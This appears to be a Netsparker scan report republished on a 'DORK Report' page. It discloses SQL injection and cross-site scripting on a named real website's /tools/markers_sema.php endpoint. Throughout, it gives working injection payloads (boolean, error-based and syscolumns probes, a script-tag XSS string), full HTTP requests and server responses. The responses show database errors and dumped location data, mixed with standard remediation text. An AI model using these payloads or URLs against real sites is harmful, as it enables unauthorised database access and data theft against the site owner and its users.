XSS.CX Home

The DORK Report

Loading

SQL Injection, vcahospitals.com REPORT SUMMARY

Netsparker - Scan Report Summary
TARGET URL
 http://www.vcahospitals.com/tools/markers_sem...
SCAN DATE
 3/5/2011 6:18:33 AM
REPORT DATE
 3/5/2011 6:54:20 AM
SCAN DURATION
 00:00:59

Total Requests

Average Speed

req/sec.
9
identified
5
confirmed
3
critical
2
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Blind SQL Injection, Boolean SQL Injection, SQL Injection
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
33 %
IMPORTANT
11 %
LOW
33 %
INFORMATION
22 %
Boolean Based SQL Injection

Boolean Based SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

- /tools/markers_sema.php

/tools/markers_sema.php CONFIRMED

http://www.vcahospitals.com/tools/markers_sema.php?sema='+OR+'ns'%3d'ns

Parameters

Parameter Type Value
sema GET ' OR 'ns'='ns

Request

GET /tools/markers_sema.php?sema='+OR+'ns'%3d'ns HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=hcgpjokc2ihsutq552fv9m6k57
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Type: text/xml
Content-Length: 115680


<?xml version="1.0" encoding="ISO-8859-1"?><markers><marker name="VCA Northwest Veterinary Specialists" address="16756 S.E. 82nd Drive, Clackamas, OR 97015" phone="503-656-3999" shortname="northwest-veterinary-specialists" distance="" lat="" lng="" /><marker name="VCA San Francisco Veterinary Specialists" address="600 Alabama Street, San Francisco, CA 94110" phone="415-401-9200" shortname="san-francisco" distance="" lat="" lng="" /><marker name="VCA Animal Hospital Default" address="Please call for address., Santa Monica, CA 90064" phone="800-966-1222" shortname="vca-animal-hospital-default" distance="" lat="" lng="" /><marker name="VCA Animal Specialty Group" address="5610 Kearny Mesa Rd., Suite B, San Diego, CA 92111" phone="858-560-8006" shortname="animal-specialty-group" distance="" lat="" lng="" /><marker name="VCA Vet Care Animal Hospital" address="435 Rayford Road, Spring , TX 77386" phone="281-367-5726" shortname="vet_care" distance="" lat="" lng="" /><marker name="VCA Test Hospital Numero #3" address="211 East Ocean Avenue, Goleta, CA 93317" phone="800-987-6543" shortname="test_hospital_numero_3" distance="" lat="" lng="" /><marker name="VCA Bay Area Veterinary Specialists &amp; Emergency Hospital" address="14790 Washington Ave., San Leandro, CA 94578" phone="510-483-7387" shortname="bay-area-specialists" distance="" lat="" lng="" /><marker name="VCA Sundown Animal Hospital" address="10616 N. 71st Place, Scottsdale, AZ 85254" phone="480-948-6360" shortname="sundown" distance="" lat="" lng="" /><marker name="VCA Test Hospital #1" address="12401 West Olympic Blvd., Los Angeles, CA 90064" phone="310-571-6500" shortname="test-hospital-1" distance="" lat="" lng="" /><marker name="VCA Nob Hill Animal Hospital" address="855 N. Nob Hill Rd., Plantation, FL 33324" phone="954-382-0066" shortname="nob_hill" distance="" lat="" lng="" /><marker name="Test Hybrid Hospital" address="123 fake st, long beach, CA 90814" phone="562-555-5555" shortname="test-hybrid" distance="" lat="" lng="" /><marker name="VCA SE Portland Surgery Specialists" address="13830 SE Stark St., Portland, OR 97233" phone="503-255-8139" shortname="se-portland" distance="" lat="" lng="" /><marker name="VCA Adler Animal Hospital and Pet Resort" address="16911 Roscoe Blvd., North Hills, CA 91343" phone="818-893-6366" shortname="adler-pet-resort-deleted" distance="" lat="" lng="" /><marker name="VCA Animal Hospital of Santa Cruz" address="815 Mission Street, Santa Cruz, CA 95060" phone="831-427-3345" shortname="santa-cruz" distance="2.68996568470235" lat="36.972889" lng="-122.034976" /><marker name="VCA Johnson Animal Hospital" address="524 N. Santa Cruz Ave., Los Gatos, CA 95030" phone="408-354-9530" shortname="johnson" distance="16.1162692436082" lat="37.232637" lng="-121.978994" /><marker name="VCA Almaden Valley Animal Hospital" address="15790 Almaden Expressway, San Jose, CA 95120" phone="408-268-3550" shortname="almaden-valley" distance="17.892570132548" lat="37.238489" lng="-121.873489" /><marker name="VCA Blossom Hill Animal Hospital" address="955 Blossom Hill Road, San Jose, CA 95123" phone="408-227-3717" shortname="blossom-hill" distance="18.8546405085928" lat="37.250669" lng="-121.864784" /><marker name="VCA Hemingway Cat Hospital" address="12840 S. Saratoga-Sunnyvale Rd., Saratoga, CA 95070" phone="408-741-4844" shortname="hemingway-cat" distance="19.5647808156699" lat="37.281984" lng="-122.032162" /><marker name="VCA Winchester Animal Hospital" address="2110 S. Winchester Blvd., Campbell, CA 95008" phone="408-378-4380" shortname="winchester" distance="19.9105958648558" lat="37.285346" lng="-121.949677" /><marker name="VCA Bascom Animal Hospital" address="2175 S. Bascom Ave., Campbell, CA 95008" phone="408-371-5630" shortname="bascom" distance="19.9648813323582" lat="37.283832" lng="-121.932162" /><marker name="VCA Orchard Plaza Animal Hospital" address="5841 Cottle Road, San Jose, CA 95123" phone="408-227-9110" shortname="orchard-plaza" distance="20.0961345284662" lat="37.245324" lng="-121.804084" /><marker name="VCA San Martin Animal Hospital" address="12955 Monterey Road, San Martin, CA 95046" phone="408-683-4777" shortname="san-martin" distance="22.3240917536482" lat="37.081340" lng="-121.608280" /><marker name="VCA Lawrence Animal Hospital" address="771 Lawrence Expressway, Santa Clara, CA 95051" phone="408-296-3300" shortname="lawrence" distance="23.1971965563376" lat="37.335696" lng="-121.995349" /><marker name="VCA Vets &amp; Pets Animal Hospital" address="3345 El Camino Real, Santa Clara, CA 95051" phone="408-246-1893" shortname="vets-pets" distance="24.3662144164174" lat="37.352500" lng="-121.987763" /><marker name="VCA Crocker Animal Hospital" address="475 N. Jackson Ave., San Jose, CA 95133" phone="408-272-1330" shortname="crocker" distance="26.6181714087596" lat="37.366665" lng="-121.851721" /><marker name="VCA Stanford Animal Hospital" address="4111 El Camino Real, Palo Alto, CA 94306" phone="650-493-4233" shortname="stanford" distance="29.4844200881557" lat="37.414665" lng="-122.126382" /><marker name="VCA All Pets Animal Hospital Salinas" address="1257 East Alisal Street, Salinas, CA 93905" phone="831-422-1976" shortname="all-pets-salinas" distance="30.815949138318" lat="36.672460" lng="-121.621819" /><marker name="VCA Mission San Jose Animal Hospital" address="1500 Washington Blvd., Fremont, CA 94539" phone="510-651-0100" shortname="mission-san-jose" distance="36.9026610580256" lat="37.531503" lng="-121.934335" /><marker name="VCA Holly Street Animal Hospital" address="501 Laurel Street, San Carlos, CA 94070" phone="650-631-7400" shortname="holly-street" distance="37.9421027237883" lat="37.507809" lng="-122.262487" /><marker name="VCA All About Pets Animal Hospital" address="34664 Alvarado Niles Rd., Union City, CA 94587" phone="510-475-7387" shortname="all-about-pets-ca" distance="40.5336425608292" lat="37.586432" lng="-122.018390" /><marker name="VCA Bayshore Animal Hospital" address="233 North Amphlett Boulevard, San Mateo, CA 94401" phone="650-342-7022" shortname="bayshore" distance="43.5670075459526" lat="37.576546" lng="-122.320808" /><marker name="VCA Lewelling Animal Hospital" address="525 Lewelling Blvd., San Leandro, CA 94579" phone="510-357-4227" shortname="lewelling" distance="48.0279148252334" lat="37.686790" lng="-122.134579" /><marker name="VCA Bay Area Animal Hospital" address="4501 Shattuck Avenue, Oakland, CA 94609" phone="510-654-8375" shortname="bay-area" distance="59.352680797735" lat="37.833054" lng="-122.263656" /><marker name="VCA Old River Animal Hospital" address="520 West Eleventh Street, Tracy, CA 95376" phone="209-835-5166" shortname="old-river" distance="59.8347710484776" lat="37.739557" lng="-121.433178" /><marker name="VCA Cottage Animal Hospital" address="1590 Boulevard Way, Walnut Creek, CA 94595" phone="925-935-9080" shortname="cottage" distance="61.3227808327569" lat="37.885340" lng="-122.077595" /><marker name="VCA Albany Animal Hospital" address="1550 Solano Ave, Albany, CA 94707" phone="510-526-2053" shortname="albany" distance="63.5227426806148" lat="37.890942" lng="-122.285486" /><marker name="VCA Monte Vista Animal Hospital" address="1488 Washington Blvd., Concord, CA 94521" phone="925-672-1100" shortname="monte-vista" distance="65.7565141999231" lat="37.951022" lng="-121.956544" /><marker name="VCA Madera Pet Hospital" address="5796 Paradise Drive, Corte Madera, CA 94925" phone="415-924-1271" shortname="madera-pet" distance="69.7348361813234" lat="37.923547" lng="-122.512676" /><marker name="VCA Benicia Animal Hospital" address="335 W. Military St., Benicia, CA 94510" phone="707-745-4600" shortname="benicia" distance="73.5137712376185" lat="38.056257" lng="-122.160650" /><marker name="VCA Animal Care Center of Sonoma County" address="6470 Redwood Drive, Rohnert Park, CA 94928" phone="707-584-4343" shortname="sonoma-county" distance="101.030711082141" lat="38.347420" lng="-122.717340" /><marker name="VCA Elk Grove Animal Hospital" address="8640 Elk Grove Blvd., Elk Grove, CA 95624" phone="916-685-9589" shortname="elk-grove" distance="103.00694352048" lat="38.408788" lng="-121.383806" /><marker name="VCA Bradshaw Large Animal Hospital" address="9609 Bradshaw Rd., Elk Grove, CA 95624" phone="916-685-4673" shortname="bradshaw-large" distance="103.90071857549" lat="38.408557" lng="-121.334703" /><marker name="VCA Bradshaw Animal Hospital" address="9609 Bradshaw Road, Elk Grove, CA 95624" phone="916-685-2494" shortname="bradshaw" distance="103.90071857549" lat="38.408557" lng="-121.334703" /><marker name="VCA Sequoia Valley Animal Hospital" address="604 Elsa Drive, Santa Rosa, CA 95407" phone="707-545-7387" shortname="sequoia-valley" distance="104.645862755649" lat="38.405472" lng="-122.713073" /><marker name="VCA Westside Animal Hospital" address="900 Fresno Avenue, Santa Rosa, CA 95407" phone="707-545-1622" shortname="westside-santa-rosa" distance="106.868049231591" lat="38.425260" lng="-122.759224" /><marker name="VCA Greenhaven Animal Hospital" address="1 Valine Court, Sacramento, CA 95831" phone="916-391-3677" shortname="greenhaven" distance="107.943671681394" lat="38.516071" lng="-121.523374" /><marker name="VCA Westside Animal Hospital" address="1550 Jefferson Blvd., West Sacramento, CA 95691" phone="916-371-8900" shortname="westside" distance="111.344255437088" lat="38.567232" lng="-121.525831" /><marker name="VCA Forestville Animal Hospital" address="5033 Gravenstein Highway North, Sebastopol, CA 95472" phone="707-887-2261" shortname="forestville" distance="111.412877014201" lat="38.457208" lng="-122.872725" /><marker name="VCA All Our Pets Animal Hospital" address="1413 60th Street, Sacramento, CA 95819" phone="916-452-2685" shortname="all-our-pets" distance="111.963411965184" lat="38.556999" lng="-121.432238" /><marker name="VCA Sacramento Veterinary Referral Center" address="9801 Old Winery Place, Sacramento, CA 95827" phone="916-362-3111" shortname="sacramento-veterinary-referral-center" distance="114.7987349046" lat="38.574608" lng="-121.329348" /><marker name="VCA Sacramento Animal Medical Group" address="4990 Manzanita Ave., Carmichael, CA 95608" phone="916-331-7430" shortname="sacramento-animal-medical-group" distance="120.165884309547" lat="38.655993" lng="-121.327529" /><marker name="VCA Highlands Animal Hospital" address="3451 Elkhorn Blvd., North Highlands, CA 95660" phone="916-332-2845" shortname="highlands-ca" distance="121.515238769425" lat="38.690471" lng="-121.386059" /><marker name="VCA Greenback Animal Hospital" address="8311 Greenback Lane, Fair Oaks, CA 95628" phone="916-725-1541" shortname="greenback" distance="122.961224959827" lat="38.678852" lng="-121.252746" /><marker name="VCA Greenback Pet Resort" address="8311 Greenback Lane, Fair Oaks, CA 95628" phone="916-726-3400" shortname="greenback-pet-resort" distance="122.961224959827" lat="38.678852" lng="-121.252746" /><marker name="VCA American River Animal Hospital" address="9391 Greenback Lane, Orangevale, CA 95662" phone="916-988-1721" shortname="american-river" distance="123.8440871396" lat="38.678230" lng="-121.203180" /><marker name="VCA Yuba Sutter Animal Hospital" address="1368 Colusa Highway, Yuba City, CA 95993" phone="530-673-8853" shortname="yuba-sutter" distance="149.276085540833" lat="39.141363" lng="-121.636760" /><marker name="VCA South County Animal Hospital" address="270 N. Halcyon, Arroyo Grande, CA 93420" phone="805-489-1361" shortname="south-county" distance="151.845426548391" lat="35.120393" lng="-120.591418" /><marker name="VCA Noah�s Ark Animal Hospital" address="160 North Fairview Avenue, Goleta, CA 93117" phone="805-683-7788" shortname="noahs-ark" distance="214.555399308095" lat="34.442506" lng="-119.830494" /><marker name="VCA Gateway Animal Hospital" address="2006 S. Barney Road, Anderson, CA 96007" phone="530-365-4521" shortname="gateway-ca" distance="238.141421701919" lat="40.438988" lng="-122.290663" /><marker name="VCA Asher Animal Hospital" address="2505 Hilltop Dr., Redding, CA 96002" phone="530-224-2200" shortname="asher" distance="247.56048154571" lat="40.571899" lng="-122.357887" /><marker name="VCA Companion Animal Hospital" address="2133 Eureka Wy, Redding, CA 96001" phone="530-225-8910" shortname="companion" distance="248.760460466824" lat="40.586472" lng="-122.402195" /><marker name="VCA Crestwood Animal Hospital" address="1131 Inyokern Road, Ridgecrest, CA 93555" phone="760-446-7616" shortname="crestwood" distance="257.166736502275" lat="35.651313" lng="-117.693827" /><marker name="VCA Parkwood Animal Hospital" address="6330 Fallbrook Ave, Woodland Hills, CA 91367" phone="818-884-5506" shortname="parkwood" distance="271.670795066865" lat="34.185262" lng="-118.623213" /><marker name="VCA Companion Kennel Resort and Spa" address="7009 Canoga Avenue, Canoga Park, CA 91303" phone="818-340-1569" shortname="companion-kennel" distance="272.043748872871" lat="34.197710" lng="-118.597864" /><marker name="VCA Veterinary Surgery and Neurology Specialists" address="20051 Ventura Blvd., Suite I, Woodland Hills, CA 91364" phone="818-610-7770" shortname="veterinary-specialists" distance="274.434222924664" lat="34.171613" lng="-118.570347" /><marker name="VCA McClave Animal Hospital" address="6950 Reseda Boulevard, Reseda, CA 91335" phone="818-881-5102" shortname="mcclave" distance="274.554497502633" lat="34.196594" lng="-118.535904" /><marker name="VCA Adler Animal Hospital and Pet Resort" address="16911 Roscoe Blvd., North Hills, CA 91343" phone="818-893-6366" shortname="adler" distance="274.689601936919" lat="34.221654" lng="-118.501582" /><marker name="VCA Adler Pet Resort" address="16911 Roscoe Blvd., North Hills, CA 91343" phone="818-893-6366" shortname="adler-pet-resort" distance="274.689601936919" lat="34.221654" lng="-118.501582" /><marker name="VCA Animal Hospital (Burbank)" address="2723 West Olive Avenue, Burbank, CA 91505" phone="818-845-7246" shortname="burbank-ca" distance="284.601512069204" lat="34.159433" lng="-118.331569" /><marker name="VCA Wilshire Animal Hospital" address="2421 Wilshire Blvd., Santa Monica, CA 90403" phone="310-828-4587" shortname="wilshire" distance="284.891404849587" lat="34.034573" lng="-118.479464" /><marker name="VCA Santa Monica Dog and Cat Hospital" address="2010 Broadway, Santa Monica, CA 90404" phone="310-453-5459" shortname="santa-monica&q..
SQL Injection

SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /tools/markers_sema.php

/tools/markers_sema.php CONFIRMED

http://www.vcahospitals.com/tools/markers_sema.php?sema='%2B(select+1+and+row(1%2c1)%3e(select+count..

Parameters

Parameter Type Value
sema GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /tools/markers_sema.php?sema='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=hcgpjokc2ihsutq552fv9m6k57
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 51
Content-Type: text/html


Duplicate entry '_!@4dilemma:0' for key 'group_key'
[High Possibility] SQL Injection

[High Possibility] SQL Injection

1 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /tools/markers_sema.php

/tools/markers_sema.php

http://www.vcahospitals.com/tools/markers_sema.php?sema='%2B%20(select+convert(int,CHAR(95)%2BCHAR(3..

Parameters

Parameter Type Value
sema GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /tools/markers_sema.php?sema='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: www.vcahospitals.com
Cookie: PHPSESSID=gnrb178du6ouqlhertfrhhq1v7

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 227
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 24
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /tools/markers_sema.php

/tools/markers_sema.php CONFIRMED

http://www.vcahospitals.com/tools/markers_sema.php?sema='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%..

Parameters

Parameter Type Value
sema GET '"--></style></script><script>alert(0x0000D2)</script>

Request

GET /tools/markers_sema.php?sema='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000D2)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=hcgpjokc2ihsutq552fv9m6k57
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:50:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 227
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0000D2)</script>' AND i_emergency_only' at line 24
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /tools/markers_sema.php

/tools/markers_sema.php

http://www.vcahospitals.com/tools/markers_sema.php?sema=E13

Extracted Version

Apache/2.2.15 (Win32)

Request

GET /tools/markers_sema.php?sema=E13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=fjqo1uu20brcblqches8qf3ph7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 3592
Content-Type: text/xml


<?xml version="1.0" encoding="ISO-8859-1"?><markers><marker name="VCA Healthy PAWS Medical Center" address="14840 Washington Street, Haymarket, VA 20169" phone="703-754-4146" shortname="healthy-paws" distance="2398.24998884716" lat="38.810654" lng="-77.632892" /><marker name="VCA Chancellor Animal Hospital" address="11101 Gordon Road, Fredericksburg, VA 22407" phone="540-786-2282" shortname="chancellor" distance="2408.57401465928" lat="38.259782" lng="-77.583096" /><marker name="VCA University Veterinary Clinic" address="10681 Braddock Road, Fairfax, VA 22032" phone="703-385-1054" shortname="university-va" distance="2414.77611211473" lat="38.826928" lng="-77.315669" /><marker name="VCA West End Animal Hospital" address="3047 Lauderdale Dr., Richmond, VA 23233" phone="804-364-2801" shortname="west-end" distance="2415.22374272805" lat="37.638578" lng="-77.632404" /><marker name="VCA Annandale Animal Hospital" address="7405 Little River Turnpike, Annandale, VA 22003" phone="703-941-3100" shortname="annandale" distance="2420.79648403722" lat="38.831031" lng="-77.200522" /><marker name="VCA Pets First Animal Hospital" address="9201 Staples Mill Rd., Richmond, VA 23228" phone="804-672-3576" shortname="pets-first" distance="2421.37906483131" lat="37.641687" lng="-77.516085" /><marker name="VCA Total Care Animal Hospital" address="6506 W. Broad St., Richmond, VA 23230" phone="804-282-4215" shortname="total-care" distance="2422.17275101593" lat="37.598608" lng="-77.513729" /><marker name="VCA Barcroft Cat Hospital" address="6357 Columbia Pike, Falls Church, VA 22041" phone="703-941-2852" shortname="barcroft-cat" distance="2423.05494911975" lat="38.836506" lng="-77.156299" /><marker name="VCA Alexandria Animal Hospital" address="2660 Duke Street, Alexandria, VA 22314" phone="703-751-2022" shortname="alexandria" distance="2427.71383308406" lat="38.806337" lng="-77.075843" /><marker name="VCA Beacon Hill Cat Hospital" address="6610 Richmond Highway, Alexandria, VA 22306" phone="703-765-2287" shortname="beacon-hill" distance="2427.86446525968" lat="38.775083" lng="-77.081152" /><marker name="VCA Old Town Animal Hospital" address="425 North Henry Street, Alexandria, VA 22314" phone="703-549-3647" shortname="old-town" distance="2429.00785402607" lat="38.810090" lng="-77.050340" /><marker name="VCA Animal Care Associates" address="2403 Boulevard, Colonial Heights, VA 23834" phone="804-520-2273" shortname="animal-care-associates" distance="2433.27749049368" lat="37.270633" lng="-77.403029" /><marker name="VCA Herndon-Reston Animal Hospital" address="500 Elden Street, Herndon, VA 20170" phone="703-437-5655" shortname="herndon-reston" distance="2454.57737939133" lat="36.098320" lng="-77.378910" /><marker name="VCA Boulevard Animal Hospital" address="12620 Nettles Dr., Newport News, VA 23606" phone="757-874-3200" shortname="boulevard" distance="2484.73823865474" lat="37.085142" lng="-76.497693" /><marker name="VCA James River Animal Hospital" address="9804 Warwick Blvd, Newport News, VA 23601" phone="757-595-5505" shortname="james-river" distance="2487.97919582941" lat="37.026483" lng="-76.455553" /><marker name="VCA Airline Boulevard Animal Hospital" address="615 Airline Blvd, Portsmouth, VA 23707" phone="757-393-1011" shortname="airline-boulevard" distance="2497.4437131301" lat="36.833237" lng="-76.340309" /><marker name="VCA Animal Care Center" address="1228 West Little Creek Road, Norfolk, VA 23505" phone="757-423-3900" shortname="animal-care-center" distance="2498.41506589601" lat="36.916240" lng="-76.295544" /></markers>
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /tools/markers_sema.php

/tools/markers_sema.php

http://www.vcahospitals.com/tools/markers_sema.php?sema=E13

Extracted Version

PHP/5.2.14

Request

GET /tools/markers_sema.php?sema=E13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=fjqo1uu20brcblqches8qf3ph7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 3592
Content-Type: text/xml


